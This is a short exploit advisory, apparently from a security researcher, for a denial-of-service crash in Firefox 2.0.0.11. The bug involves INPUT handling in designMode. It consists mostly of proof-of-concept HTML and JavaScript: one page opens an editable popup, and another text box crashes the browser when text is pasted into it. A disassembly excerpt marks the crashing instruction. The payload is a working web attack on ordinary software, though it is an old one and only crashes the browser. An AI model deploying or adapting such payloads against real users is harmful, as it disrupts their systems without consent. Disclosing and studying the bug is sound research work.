Firefox 2.0.0.11 INPUT Denial Of Service
Author: Azizov Emin (azizov@xxxxxxxxxxxx)
ITDEFENCE.ru
Denial of Service at INPUT tag processing
(designMode = on)
POC:
<html>
<head>
<title>!</title>
<script type='text/javascript'>
function wnd_open(uri,size) {
pwin=window.open(uri,'','menubar=no,scrollbars=yes,location=no,'+size);
pwin.document.body.contentEditable='true';
pwin.document.designMode='on';
if(window.focus){pwin.focus()};
}
</script>
</head>
<body>
<input type='button' name='sb' value='start'
onclick='wnd_open("/evl.html","width=550,height=350");'>
</body>
</html>
----------------------------------------------------------------------------------------------------------------
<!--
005EC769 |> 8B06 MOV EAX,DWORD PTR DS:[ESI]
005EC76B |. 6A 00 PUSH 0
005EC76D |. 53 PUSH EBX
005EC76E |. 56 PUSH ESI
005EC76F |. FF50 30 CALL DWORD PTR DS:[EAX+30]
005EC772 |> 8B5B 14 MOV EBX,DWORD PTR DS:[EBX+14]
005EC775 |. 5E POP ESI
005EC776 |. EB 12 JMP SHORT firefox.005EC78A
005EC778 |> 837B 18 00 /CMP DWORD PTR DS:[EBX+18],0
005EC77C |. 75 09 |JNZ SHORT firefox.005EC787
005EC77E |. FF75 10 |PUSH DWORD PTR SS:[EBP+10]
005EC781 |. 8B03 |MOV EAX,DWORD PTR DS:[EBX]
005EC783 |. 53 |PUSH EBX
005EC784 |. FF50 28 |CALL DWORD PTR DS:[EAX+28]
005EC787 |> 8B5B 10 |MOV EBX,DWORD PTR DS:[EBX+10]
005EC78A |> 85DB TEST EBX,EBX
005EC78C |.^75 EA \JNZ SHORT firefox.005EC778
005EC78E |> 5F POP EDI
005EC78F |. 33C0 XOR EAX,EAX
005EC791 |. 5B POP EBX
005EC792 |. C9 LEAVE
005EC793 \. C2 0C00 RETN 0C
005EC796 /$ 56 PUSH ESI
005EC797 |. 8B7424 08 MOV ESI,DWORD PTR SS:[ESP+8]
005EC79B |. 57 PUSH EDI
005EC79C |. 8BF9 MOV EDI,ECX
005EC79E |. 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C] <-------//BREAK
005EC7A1 |. 85C0 TEST EAX,EAX
005EC7A3 |. 74 09 JE SHORT firefox.005EC7AE
005EC7A5 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
005EC7A7 |. 50 PUSH EAX
005EC7A8 |. FF91 C0000000 CALL DWORD PTR DS:[ECX+C0]
005EC7AE |> 8B76 14 MOV ESI,DWORD PTR DS:[ESI+14]
005EC7B1 |. EB 0B JMP SHORT firefox.005EC7BE
005EC7B3 |> 56 /PUSH ESI
005EC7B4 |. 8BCF |MOV ECX,EDI
005EC7B6 |. E8 DBFFFFFF |CALL firefox.005EC796
005EC7BB |. 8B76 10 |MOV ESI,DWORD PTR DS:[ESI+10]
005EC7BE |> 85F6 TEST ESI,ESI
005EC7C0 |.^75 F1 \JNZ SHORT firefox.005EC7B3
005EC7C2 |. 5F POP EDI
005EC7C3 |. 5E POP ESI
005EC7C4 \. C2 0400 RETN 4
-->
<html>
<head>
<title>die</title>
<style type='text/css'>
.textbox
{
padding: 2px 3px;
}
</style>
</head>
<body>
<!--
insert into textbox insert into clipboard .... text
to crash ....
-->
<input name="m_0" value="" class="textbox" size="3" id='boo'
type="text">
</body>
</html>